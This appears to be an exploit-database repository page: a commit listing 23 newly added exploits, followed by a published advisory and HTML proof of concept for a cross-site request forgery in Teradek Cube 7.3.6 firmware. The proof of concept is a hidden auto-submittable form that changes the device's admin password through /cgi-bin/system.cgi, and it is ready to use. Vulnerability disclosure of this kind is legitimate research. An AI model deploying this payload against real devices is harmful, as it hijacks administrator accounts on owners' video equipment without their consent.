08c35595ed
23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
50 lines
No EOL
1.5 KiB
HTML
50 lines
No EOL
1.5 KiB
HTML
<!--
|
|
|
|
Teradek Cube 7.3.6 CSRF Change Password Exploit
|
|
|
|
|
|
Vendor: Teradek, LLC
|
|
Product web page: https://www.teradek.com
|
|
Affected version: Firmware Version: 7.3.6 (build 26850)
|
|
Hardware Version: 1.5
|
|
Teradek Firmware Version 7.3.15
|
|
|
|
|
|
Summary: Cube packs world-class video quality into a rugged, portable
|
|
chassis for quick IP video deployments at any location. Each encoder
|
|
and decoder includes HDMI and 3G-SDI I/O, Ethernet / WiFI connectivity,
|
|
and full duplex IFB.
|
|
|
|
Desc: The application interface allows users to perform certain actions
|
|
via HTTP requests without performing any validity checks to verify the
|
|
requests. This can be exploited to perform certain actions with administrative
|
|
privileges if a logged-in user visits a malicious web site.
|
|
|
|
Tested on: lighttpd/1.4.31
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2018-5464
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5464.php
|
|
|
|
|
|
02.03.2018
|
|
|
|
-->
|
|
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://127.0.0.1/cgi-bin/system.cgi" method="POST">
|
|
<input type="hidden" name="command" value="password" />
|
|
<input type="hidden" name="pw1" value="P@ssw0rd" />
|
|
<input type="hidden" name="pw2" value="P@ssw0rd" />
|
|
<input type="hidden" name="user" value="admin" />
|
|
<input type="hidden" name="action" value="Change Password" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |